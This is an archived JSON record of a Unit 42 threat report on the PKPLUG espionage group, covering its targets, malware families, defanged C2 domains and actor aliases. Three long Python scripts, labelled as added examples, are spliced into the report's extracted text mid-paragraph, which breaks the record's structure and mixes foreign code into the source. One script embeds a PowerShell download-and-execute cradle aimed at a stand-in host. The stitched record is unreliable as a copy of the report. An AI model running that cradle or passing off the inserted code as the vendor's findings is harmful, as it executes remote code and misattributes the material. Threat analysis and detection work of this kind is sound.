{
	"id": "fe39a813-6283-466b-846e-55fd0345a6f2",
	"created_at": "2026-04-06T00:09:04.366199Z",
	"updated_at": "2026-04-10T03:36:33.573686Z",
	"deleted_at": null,
	"sha1_hash": "6eb91b46cb6e98fe6f9e4b542d243da97352459f",
	"title": "PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 282716,
	"plain_text": "PKPLUG: Chinese Cyber Espionage Group Attacking Southeast\r\nAsia\r\nBy Alex Hinchliffe\r\nPublished: 2019-10-03 · Archived: 2026-04-05 20:41:27 UTC\r\nExecutive Summary\r\nFor three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of\r\npublicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or\r\ngroups, behind these and other documented attacks referenced later in this report. We say group or groups as our\r\ncurrent visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than\r\none group which uses the same tools and has the same tasking. The name comes from the tactic of delivering\r\nPlugX malware inside ZIP archive files as part of a DLL side-loading package. The ZIP file format begins with the\r\nASCII magic bytes “PK” (0x50 0x4B) in its header, hence PKPLUG.\r\nWhile tracking these attackers, Unit 42 discovered additional, mostly custom malware families being used by\r\nPKPLUG beyond PlugX. The additional payloads include HenBox, an Android app, and Farseer, a\r\nWindows backdoor. The attackers also use the 9002 Trojan, which is believed to be shared among a small subset\r\nof attack groups. Other publicly available malware seen in relation to PKPLUG activity includes Poison Ivy and\r\nZupdax.\r\nDuring our investigations and research into these attacks, we were able to relate previous attacks documented by\r\nothers that date back as far as six years. 
Unit 42 incorporates these findings, together with our own,\r\nunder the moniker PKPLUG and continues to track accordingly.\r\nIt’s not entirely clear what PKPLUG’s ultimate objectives are, but installing backdoor Trojan implants on victim\r\nsystems, including mobile devices, implies that tracking victims and gathering information is a key goal.\r\nWe believe victims lie mainly in and around the Southeast Asia region, particularly Myanmar, Taiwan, Vietnam,\r\nand Indonesia; and likely also in various other areas in Asia, such as Tibet, Xinjiang, and Mongolia. Based on\r\ntargeting, content in some of the malware and ties to infrastructure previously documented publicly as being\r\nlinked to Chinese nation-state adversaries, Unit 42 believes with high confidence that PKPLUG has similar\r\norigins.\r\nTargeting\r\nBased on our visibility into PKPLUG’s campaigns and what we’ve learned from collaborating with industry\r\npartners, we believe victims lie mainly in and around the Southeast Asia region. Specifically, the target\r\ncountries/provinces include (with higher confidence) Myanmar and Taiwan as well as (with lower confidence)\r\nVietnam and Indonesia. Other areas in Asia targeted include Mongolia, Tibet and Xinjiang. This blog, and the\r\nassociated Adversary Playbook, provide further details including: the methods used for malware delivery, the\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 1 of 9\n\nsocial engineering topics of decoy applications and documents and the Command \u0026 Control (C2) infrastructure\r\nthemes.\r\nIndonesia, Myanmar and Vietnam are ASEAN members, contributing towards intergovernmental cooperation in\r\nthe region. Mongolia, specifically the independent country also known as Outer Mongolia, has a long-standing\r\nand complex relationship with the PRC. 
Tibet and Xinjiang are autonomous regions (AR) of China, areas defined by their\r\nethnic minority populations and granted a degree of self-government while ultimately answering to the\r\nPeople’s Republic of China (PRC). Of China’s five ARs, Tibet and Xinjiang are the only two where the titular ethnic group\r\nmaintains a majority over other population groups.\r\nMost, if not all, of the seven countries or regions are involved in some way with Beijing's Belt and Road Initiative\r\n(BRI), designed to connect 71 countries across Southeast Asia to Eastern Europe and Africa. The path through\r\nXinjiang is especially important to the BRI’s success, but is more often heard of due to conflicts between the\r\nChinese government and the ethnic Uyghur population. News of the BRI is peppered with stories of success and\r\nfailure, of countries for and against the BRI and of countries pulling out of existing BRI projects.\r\nFurther tensions in the region stem from competing ownership claims over the South China Sea, including fishing\r\nquotas and as-yet unproven oil and gas reserves. At least three countries in the region (Malaysia, and the targets\r\nTaiwan and Vietnam) have laid claim to parts of these waters, and some use the area for the vast majority of their\r\ntrade. Foreign militaries also patrol, attempting to keep the area open.\r\nTaiwan, which isn’t an AR and doesn’t appear to be actively involved with the BRI, has its own long-standing\r\nhistory with the PRC -- a recent $2.2 billion arms sale with the U.S. may exacerbate matters.\r\nTimeline\r\nBefore continuing, it’s worth highlighting our research and that of others relating to the intrusion set that we refer to as\r\nPKPLUG. This section documents prior work surrounding cyber attacks relating to PKPLUG. 
The following\r\nfigure illustrates the chronological order of the publications -- highlighting some key findings from each.\r\nAs you can see from the timeline, PKPLUG has been active for six years or more with a variety of targets and\r\nmethods of delivery and compromise.\r\nFigure 1. Timeline of publications and key findings relating to PKPLUG\r\nPlease note: the dates shown on the horizontal timeline bar in Figure 1 above relate to the publishing date, not the\r\ncampaign dates, although some were fairly close together. As an example to illustrate the difference in dates,\r\nHenBox was discovered in 2018 but has samples ranging from 2015 through to this week. PlugX and Poison Ivy\r\nare still doing the rounds and their use by different groups is well known. Whether they relate to PKPLUG is\r\nanother matter.\r\n#1: In November 2013, Blue Coat Labs published a report describing a case of attacks against Mongolian targets\r\nusing PlugX malware. Like so many other attacks using PlugX over the past decade or more, Blue Coat noted the\r\nDLL side-loading technique used to launch the malicious payload via legitimate, signed applications. Their report\r\nalso documented the group’s use of an exploit against software vulnerabilities in Microsoft Office. In this case,\r\na weaponized Word document saved in Single File Web Page format -- usually with an .mht file\r\nextension -- exploited CVE-2012-0158 to drop and execute a signed WinRAR SFX archive containing\r\nthe side-loading package and PlugX payload. 
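The group is named after the PK magic that opens every ZIP, and the side-loading packages described in this report pair a legitimate signed EXE with a DLL it loads by name and an opaque payload blob. The triage script below is an added example, not Unit 42 or PKPLUG code: it checks the ZIP magic and then looks for that EXE-plus-DLL layout inside the archive. The archive it inspects is constructed in the script, the file names are hypothetical, and the is_zip, build_sample_zip and triage helpers and the list of payload-blob extensions are assumptions for the example.

```python
import io
import zipfile

# Added example, not Unit 42 or PKPLUG code. Triage a file by the ZIP (PK)
# magic and then look for the DLL side-loading layout the report describes.
ZIP_MAGICS = (
    bytes([0x50, 0x4B, 0x03, 0x04]),   # PK 0x03 0x04: local file header
    bytes([0x50, 0x4B, 0x05, 0x06]),   # PK 0x05 0x06: empty archive
    bytes([0x50, 0x4B, 0x07, 0x08]),   # PK 0x07 0x08: spanned archive
)
PE_MAGIC = bytes([0x4D, 0x5A])          # MZ: start of any PE image
# Assumption: extensions side-loaders commonly use for the encrypted payload blob.
PAYLOAD_EXTS = ('.dat', '.bin', '.hlp', '.cfg')


def is_zip(data):
    return data[:4] in ZIP_MAGICS


def build_sample_zip():
    # Constructed sample archive; names are hypothetical, bodies are stubs.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('Invitation/player.exe', PE_MAGIC + bytes(62))  # stand-in for a signed host EXE
        zf.writestr('Invitation/player.dll', PE_MAGIC + bytes(62))  # loader DLL placed beside it
        zf.writestr('Invitation/player.dat', bytes(range(256)))     # opaque payload blob
        zf.writestr('Invitation/Invitation.docx', b'PK decoy')      # decoy document (itself a ZIP)
    return buf.getvalue()


def triage(data):
    result = {'is_zip': is_zip(data), 'findings': []}
    if not result['is_zip']:
        return result
    per_dir = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith('/'):
                continue                      # directory entry, nothing to inspect
            directory, _, fname = name.rpartition('/')
            head = zf.read(name)[:2]          # enough to test for the MZ header
            per_dir.setdefault(directory, []).append((fname.lower(), head))
    for directory, files in per_dir.items():
        exes = [f for f, head in files if f.endswith('.exe') and head == PE_MAGIC]
        dlls = [f for f, head in files if f.endswith('.dll') and head == PE_MAGIC]
        blobs = [f for f, head in files if f.endswith(PAYLOAD_EXTS)]
        if exes and dlls:
            result['findings'].append({
                'directory': directory,
                'exe': exes,
                'dll': dlls,
                'payload_blob': blobs,
                # an EXE and a DLL sharing a base name is the classic side-loading pair
                'same_basename': any(e[:-4] == d[:-4] for e in exes for d in dlls),
            })
    return result


if __name__ == '__main__':
    print(triage(build_sample_zip()))
```

The PK magic on its own is a weak signal, since OOXML documents, APKs and JARs are all ZIPs (the decoy docx in the sample starts with PK too), so the layout check carries the weight. A production version would additionally verify the Authenticode signature on the EXE and compare the DLL name against the EXE's import table, neither of which this script does.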
Considering all the malware related to PKPLUG that Unit 42 has\r\nanalyzed, the use of such exploits appears to be less common than a spear-phishing technique making use of social\r\nengineering to lure victims into running their malware.\r\n#2: A report published in April 2016 by Arbor Networks detailed recent cyber attacks using Poison Ivy malware\r\nagainst targets in Myanmar and other countries in Asia over the previous twelve months.\r\nThey noted phishing emails using ASEAN membership, economics and democracy-related topics to weaponize\r\ndocuments delivering the Poison Ivy payloads. While Arbor didn’t know the exact victims, they inferred likely\r\ntargets based on the content of emails and associated malware. DLL side-loading was also mentioned as the\r\nmethod to install the malware.\r\n#3: Unit 42 published research that reported attacks using the 9002 Trojan delivered through Google Drive. The\r\ndownload originated with a spear-phishing email containing a shortened URL that redirected multiple times before\r\ndownloading a ZIP file hosted on Google Drive. The HTTP redirection also carried information about the\r\nvictim who received the spear-phish and clicked the link. In this case, the information related to a well-known\r\npolitician and human rights activist in Myanmar. The filename of the ZIP archive also related to initiatives in the\r\ncountry, as did the decoy document contents. The ZIP file contained a DLL side-loading package abusing a Real\r\nPlayer executable signed by RealNetworks, Inc. in order to load the 9002 payload.\r\n#4: In March 2017, researchers published a report in Japanese (later translated into English) that described attacks\r\nseen by VKRL -- a Hong Kong-based cybersecurity company -- that were using spear-phishing emails with URLs\r\nusing GeoCities Japan to deliver malware. 
The content of the website contained encoded VBScript that executed\r\nPowerShell commands to download a Microsoft Word document from the same GeoCities site, as well as another\r\nencoded PowerShell script closely resembling PowerSploit -- a PowerShell post-exploitation framework for\r\npentesters that’s available on GitHub -- that was responsible for decoding and launching a Poison Ivy payload.\r\nAnother GeoCities account was found hosting similar packages, including one targeting Mongolia based on the\r\ncontents of the decoy documents. The contents of the file, assuming a victim clicked on the URL in the spear-phishing email, resemble the structure used in a technique known as AppLocker Bypass whereby trusted\r\nWindows executables can be used to execute malicious payloads.\r\n#5: In early 2018, Unit 42 discovered a new Android malware family that we named “HenBox”; we are tracking\r\nover 400 related samples dating back as far as late 2015 and continuing to the present day. HenBox often\r\nmasquerades as legitimate Android apps and appears to primarily target the Uyghurs -- a minority Turkic ethnic\r\ngroup that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in Northwest China --\r\nand also targets devices made by Chinese manufacturer Xiaomi.\r\nSmartphones are the dominant form of internet access in the region and hence make good targets for such\r\nmalware. Once installed, HenBox steals information from a myriad of sources on the device, including harvesting\r\noutgoing phone calls to numbers with a “+86” prefix -- the country code for the PRC -- and accessing the device\r\nmicrophone and cameras.\r\nDuring investigations, data revealed an older version of HenBox had been downloaded from the uyghurapps[.]net\r\nwebsite, which appears to be a third-party Android app store serving the Uyghur community based on the domain\r\nname, language of the site and app content hosted. 
HenBox was masquerading as another app -- DroidVPN --\r\nwhich was also embedded within HenBox and installed post-infection.\r\n#6: Based on further investigations and pivoting around HenBox infrastructure, Unit 42 discovered a previously unknown Windows backdoor Trojan called Farseer. Farseer also uses the DLL side-loading technique to install\r\npayloads -- this time favoring a signed Microsoft executable from Visual Studio to appear benign. A VBScript\r\ncomponent is used, via a registry persistence hook, to launch the Microsoft executable and the Farseer payload\r\nduring the user login process. In earlier Farseer variants, we saw decoy documents being used, including one case\r\nof a PDF containing a news article relating to Myanmar. Mongolia also appears to be a target based on telemetry\r\nprovided by an industry partner of ours.\r\nFurther information relating to these publications, together with the respective Indicators of Compromise (IoC) and\r\nTactics, Techniques and Procedures (TTPs) used, is available in the PKPLUG Adversary Playbook.\r\nTying It All Together\r\nThe following Maltego image shows the vast majority of known infrastructure and some of the known malware\r\nsamples related to PKPLUG, and the chart continues to grow as we discover more about this adversary. The\r\nindexed shapes that overlay the figure provide a reference back to the published work chronology mentioned\r\nabove.\r\nFigure 2. 
PKPLUG Maltego diagram highlighting published research\r\nOverlaps between the different campaigns documented, and the malware families used in them, exist both in\r\ninfrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of\r\nmalicious traits (program runtime behaviors or static code characteristics are also where relationships can be\r\nfound or strengthened).\r\nFigure 3 below shows a very simplified view of the six core publications again, as per Figure 2 above, but with\r\ntrimmed-down infrastructure to highlight some of the core overlaps.\r\nFigure 3. Simplified Maltego diagram showing high-level ties\r\nThe C2 infrastructure blogged by Blue Coat Labs in their publication (#1) “PlugX used against Mongolian\r\ntargets” included ppt.bodologetee[.]com, which has infrastructure ties to microsoftwarer[.]com through an IPv4 address shared with its\r\nparent domain bodologetee[.]com. Domain microsoftwarer[.]com was found after threat hunting based on facts\r\nprovided in publication (#4) “FHAPPI Campaign: FreeHosting APT PowerSploit Poison Ivy” in relation to the\r\nFHAPPI campaign.\r\nThe FHAPPI campaign (#4) was documented as using PowerShell and PowerSploit code in order to infect victims\r\nwith Poison Ivy, but very similar code was also found around PlugX malware, some of which had C2\r\ncommunication with logitechwkgame[.]com. Domain logitechwkgame[.]com was documented by Unit 42 in\r\npublication (#3) “Attack Delivers 9002 Trojan Through Google Drive” as the C2 for the 9002 Trojans analyzed.\r\nFHAPPI is also connected, through another malware sample whose C2 infrastructure shares an IPv4\r\naddress with microsoftdefence[.]com, to the malware documented in Arbor Networks’ publication (#2) “Poison Ivy\r\nActivity Targeting Myanmar, Asian Countries”, which also used that domain for C2 communication. 
Other Poison Ivy samples also\r\nrelated to the campaigns documented by Arbor Networks used domain webserver.servehttp[.]com for C2\r\ncommunication. Said samples also shared overlaps in runtime characteristics with other Poison Ivy samples that\r\nhave been analyzed and confirmed as having C2 communications with certain domains that relate to both Blue\r\nCoat Labs’ publication (#1) and Unit 42’s research into Farseer malware and their publication (#6) “Farseer:\r\nPreviously Unknown Malware Family bolsters the Chinese armoury”. Those domains are yahoomesseges[.]com and\r\nouthmail[.]com (Blue Coat Labs) and tcpdo[.]net, queryurl[.]com and cdncool[.]com (Farseer), respectively. The same registrant of\r\nyahoomesseges[.]com - mongolianews@yahoo[.]com - also registered ppt.bodologetee[.]com, mentioned\r\nearlier.\r\nSome HenBox malware has used domain cdncool[.]com as well for its C2 communications, as documented in\r\nUnit 42’s publication (#5) “The Chickens Come Home to Roost.” Domain cdncool[.]com is thus connected not\r\nonly to the HenBox and Farseer campaigns, but also, through Poison Ivy malware, to the campaigns documented by\r\nBlue Coat Labs and Arbor Networks. HenBox is also connected through a third-level domain,\r\nupdate.queryurl[.]com, to queryurl[.]com, which has been used for C2 communications by some Farseer samples.\r\nOther overlaps, mainly in infrastructure, also exist (as seen in Figure 2 above) but are difficult to describe in a blog\r\nlike this, hence the use of Maltego. Figure 3, as mentioned earlier, is a simplified diagram to highlight some core\r\noverlaps.\r\nPKPLUG’s Adversary Playbook\r\nUnit 42 has previously described and published Adversary Playbooks you can view using our Playbook Viewer.\r\nTo recap briefly, Adversary Playbooks provide a Threat Intelligence package in STIX 2.0 that includes all IoCs for\r\nknown attacks by a given adversary. 
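The overlaps narrated in Tying It All Together above are easier to reason about as a graph, which is what the Maltego charts do visually. The script below is an added example, not Unit 42 data or code: it encodes only the ties that section states, uses named placeholders (ipv4:shared-A, ipv4:shared-B) for the shared IPv4 addresses the report does not print, collapses the shared Poison Ivy runtime characteristics into one trait node, and walks the graph the way an analyst pivots. The node labels, the placeholder names and the helper functions are assumptions for the example.

```python
from collections import defaultdict, deque

# Added example, not Unit 42 data or code. The overlaps stated in the report,
# encoded as an undirected graph and walked the way an analyst pivots.
# ipv4:shared-A and ipv4:shared-B are placeholders: the report says the domains
# share an IPv4 address but does not print it. trait:poison-ivy-runtime stands
# for the shared runtime characteristics between Poison Ivy samples.
PUBLICATIONS = {
    '#1': 'Blue Coat Labs: PlugX used against Mongolian targets',
    '#2': 'Arbor Networks: Poison Ivy Activity Targeting Myanmar, Asian Countries',
    '#3': 'Unit 42: Attack Delivers 9002 Trojan Through Google Drive',
    '#4': 'FHAPPI Campaign: FreeHosting APT PowerSploit Poison Ivy',
    '#5': 'Unit 42: The Chickens Come Home to Roost (HenBox)',
    '#6': 'Unit 42: Farseer',
}

TIES = [
    # #1 to #4: ppt.bodologetee.com, its parent domain and microsoftwarer.com share an IPv4
    ('pub:#1', 'domain:ppt.bodologetee.com'),
    ('domain:ppt.bodologetee.com', 'domain:bodologetee.com'),
    ('domain:bodologetee.com', 'ipv4:shared-A'),
    ('domain:microsoftwarer.com', 'ipv4:shared-A'),
    ('domain:microsoftwarer.com', 'pub:#4'),
    # #4 to #3: PlugX carrying FHAPPI-like PowerShell code talked to the 9002 C2
    ('pub:#4', 'domain:logitechwkgame.com'),
    ('domain:logitechwkgame.com', 'pub:#3'),
    # #4 to #2: another FHAPPI-linked sample shares an IPv4 with microsoftdefence.com
    ('pub:#4', 'ipv4:shared-B'),
    ('domain:microsoftdefence.com', 'ipv4:shared-B'),
    ('domain:microsoftdefence.com', 'pub:#2'),
    # #2 to #1 and #6: Poison Ivy samples with shared runtime traits and known C2 domains
    ('pub:#2', 'domain:webserver.servehttp.com'),
    ('domain:webserver.servehttp.com', 'trait:poison-ivy-runtime'),
    ('trait:poison-ivy-runtime', 'domain:yahoomesseges.com'),
    ('trait:poison-ivy-runtime', 'domain:outhmail.com'),
    ('trait:poison-ivy-runtime', 'domain:tcpdo.net'),
    ('trait:poison-ivy-runtime', 'domain:queryurl.com'),
    ('trait:poison-ivy-runtime', 'domain:cdncool.com'),
    ('domain:yahoomesseges.com', 'pub:#1'),
    ('domain:outhmail.com', 'pub:#1'),
    ('domain:tcpdo.net', 'pub:#6'),
    ('domain:queryurl.com', 'pub:#6'),
    ('domain:cdncool.com', 'pub:#6'),
    # registrant pivot between two #1 domains
    ('domain:yahoomesseges.com', 'registrant:mongolianews@yahoo.com'),
    ('domain:ppt.bodologetee.com', 'registrant:mongolianews@yahoo.com'),
    # #5 HenBox: cdncool.com C2 and a third-level domain under queryurl.com
    ('pub:#5', 'domain:cdncool.com'),
    ('pub:#5', 'domain:update.queryurl.com'),
    ('domain:update.queryurl.com', 'domain:queryurl.com'),
]


def build_graph(ties):
    graph = defaultdict(set)
    for a, b in ties:
        graph[a].add(b)
        graph[b].add(a)
    return graph


def pivots(graph, node):
    # everything one hop away: what an analyst sees when expanding a node
    return sorted(graph.get(node, ()))


def shortest_pivot_path(graph, start, goal):
    # breadth-first search; returns the node chain an analyst would walk
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in graph.get(node, ()):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def publication_clusters(graph):
    # connected components, reported by the publications they contain
    seen, out = set(), []
    for node in list(graph):
        if node in seen:
            continue
        comp, stack = set(), [node]
        while stack:
            cur = stack.pop()
            if cur in comp:
                continue
            comp.add(cur)
            stack.extend(graph[cur])
        seen |= comp
        out.append(sorted(n for n in comp if n.startswith('pub:')))
    return out


if __name__ == '__main__':
    g = build_graph(TIES)
    print(publication_clusters(g))
    print(shortest_pivot_path(g, 'pub:#1', 'pub:#4'))
```

With only the ties the report states, all six publications fall into one connected cluster, and the shortest pivot from Blue Coat Labs (#1) to FHAPPI (#4) is the shared-IPv4 hop through bodologetee.com and microsoftwarer.com. Shared hosting IPs and sinkholes create false ties in real data, so each edge in a production graph should carry the evidence type and date it rests on.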
In addition, said packages also include structured information about attack\r\ncampaigns and adversary behaviours -- their TTPs -- described using Mitre’s ATT\u0026CK framework.\r\nThe Adversary Playbook for PKPLUG can be viewed here, and the STIX 2.0 content behind that can be\r\ndownloaded from here. The Playbook contains several Plays (aka campaigns; instances of the Attack Lifecycle)\r\nthat map, for the most part, to published research previously mentioned in this blog. There are Plays including\r\nspecific details from publications by Blue Coat Labs, Arbor Networks, our publication on the 9002 Trojan, and the\r\nFHAPPI campaign. HenBox has two Plays -- one for the known attack compromising a third-party app store to\r\ndeliver the malware and another containing all other HenBox data. A similar single campaign exists for Farseer\r\ncontaining all related data.\r\nConclusion\r\nEstablishing a clear picture and understanding of a threat group, or groups, is virtually impossible without total\r\nvisibility into every one of their attack campaigns. Based on this, applying a handle or moniker to a set of related\r\ndata -- such as network infrastructure, malware behavior, actor TTPs relating to delivery, exfiltration, etc. -- helps\r\nus to better understand what it is we’re investigating. 
Sharing this information -- with a handle, in this case\r\nPKPLUG -- especially in a structured, codified manner a la Adversary Playbooks, should allow others to\r\ncontribute their vantage points and enrich said data until the understanding of a threat group becomes lucid.\r\nBased on what we know and what we’ve gleaned from others’ publications, and through industry sharing,\r\nPKPLUG is a threat group, or groups, operating for at least the last six years using several malware families --\r\nsome better known (Poison Ivy, PlugX and Zupdax), others less so (9002, HenBox and Farseer).\r\nUnit 42 has been tracking the adversary for three years and, based on public reporting, believes with high\r\nconfidence that it is of Chinese nation-state origin. PKPLUG targets various countries or provinces\r\nin and around the Southeast Asia region for multiple possible reasons as mentioned above, including some\r\ncountries that are members of the ASEAN organisation, some regions that are autonomous to China, some\r\ncountries and regions somewhat involved with China’s Belt and Road Initiative, and finally, some countries that\r\nare embroiled in ownership claims over the South China Sea.\r\nThe Playbook Viewer helps to highlight some of the more common TTPs used by PKPLUG but, based on our\r\nvisibility, spear-phishing emails are the favored way to deliver payloads to their victims. Some email attachments\r\ncontained exploits taking advantage of vulnerable Microsoft Office applications; however, this technique was less\r\ncommonly used compared with social engineering to lure the victim into opening attachments. DLL side-loading\r\nseems almost ubiquitous as a method to install or run their payloads, though perhaps more recently, PowerShell\r\nand PowerSploit are also being adopted. 
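The FHAPPI delivery chain (#4) and the PowerShell trend noted just above share one detectable shape: a trusted Windows script host launching PowerShell with a hidden window and an encoded command that turns out to be a download cradle. The script below is an added example and not Unit 42 or PowerSploit code: it recovers the script from the -EncodedCommand form (base64 over UTF-16LE, the detail that trips up ad hoc decoders) and scores the traits. The process records it checks are constructed, the first-stage script points at the reserved name example.invalid, and the marker lists and helper names are assumptions for the example.

```python
import base64

# Added example, not Unit 42 or PowerSploit code. Decode the -EncodedCommand
# form of PowerShell that a VBScript launcher hands to the OS, and flag the
# traits the report associates with FHAPPI-style delivery: a trusted Windows
# script host as parent, a hidden window, and a download cradle.
ENC_FLAGS = ('-encodedcommand', '-enc', '-ec', '-e')
CRADLE_MARKERS = ('net.webclient', 'downloadstring', 'downloadfile',
                  'invoke-webrequest', 'invoke-expression', 'iex ')
SCRIPT_HOSTS = ('wscript.exe', 'cscript.exe', 'mshta.exe')

# Constructed first-stage script; example.invalid is a reserved, non-routable name.
STAGE1 = '''$w = New-Object Net.WebClient; IEX $w.DownloadString('http://example.invalid/stage2.ps1')'''


def encode_ps(script):
    # PowerShell expects base64 over UTF-16LE, not UTF-8
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def extract_encoded(cmdline):
    # return the token following an -EncodedCommand style flag, if any
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            return tokens[i + 1]
    return None


def decode_ps(blob):
    # tolerate dropped base64 padding, then decode as UTF-16LE
    padded = blob + '=' * (-len(blob) % 4)
    return base64.b64decode(padded).decode('utf-16-le')


def analyse(parent, cmdline):
    lower = cmdline.lower()
    blob = extract_encoded(cmdline)
    script = decode_ps(blob) if blob else cmdline
    body = script.lower()
    parent_image = (parent.lower().split() or [''])[0]
    traits = {
        'encoded': blob is not None,
        'hidden_window': '-w hidden' in lower or '-windowstyle hidden' in lower,
        'download_cradle': any(m in body for m in CRADLE_MARKERS),
        'script_host_parent': parent_image in SCRIPT_HOSTS,
    }
    return {'script': script, 'traits': traits, 'score': sum(traits.values())}


# Constructed process records: (parent command line, child command line).
SAMPLES = [
    ('wscript.exe //B //Nologo lure.vbs', 'powershell.exe -NoP -W Hidden -Enc ' + encode_ps(STAGE1)),
    ('explorer.exe', 'powershell.exe -Command Get-Process'),
]

if __name__ == '__main__':
    for parent, child in SAMPLES:
        print(analyse(parent, child))
```

Decoding the blob as UTF-8 instead of UTF-16LE yields a string of interleaved NUL bytes and the cradle markers never match, which is why the decoder, not just the flag, matters in a detection rule. The scoring is deliberately additive so that a benign encoded command run from Explorer scores low while the wscript-to-hidden-PowerShell-to-cradle chain scores on every trait.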
Other TTPs are described in the STIX 2.0 package and presented in the\r\nViewer.\r\nThe use of Android malware shows intent to reach targets whose computers, operating systems\r\nand ways of communicating differ from those of previous targets.\r\nPalo Alto Networks customers are protected from these threats through the following:\r\nCustomers using AutoFocus can view this activity by using the following tags:\r\nPKPlug\r\nAll malware identified is detected as malicious by WildFire and Traps\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nIndicators of compromise relating to PKPLUG can be found in the Adversary Playbook through the Playbook\r\nViewer itself, or indirectly from the STIX 2.0 JSON file powering it.\r\nSource: https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/"
	],
	"report_names": [
		"pkplug_chinese_cyber_espionage_group_attacking_asia"
	],
	"threat_actors": [
		{
			"id": "93542ae8-73cb-482b-90a3-445a20663f15",
			"created_at": "2022-10-25T16:07:24.058412Z",
			"updated_at": "2026-04-10T02:00:04.853499Z",
			"deleted_at": null,
			"main_name": "PKPLUG",
			"aliases": [
				"Stately Taurus"
			],
			"source_name": "ETDA:PKPLUG",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "926dcfeb-19dd-4786-b601-3c0c4c477b43",
			"created_at": "2023-01-06T13:46:38.787762Z",
			"updated_at": "2026-04-10T02:00:03.10053Z",
			"deleted_at": null,
			"main_name": "HenBox",
			"aliases": [],
			"source_name": "MISPGALAXY:HenBox",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434144,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.pdf",
		"text": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.txt",
		"img": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.jpg"
	}
}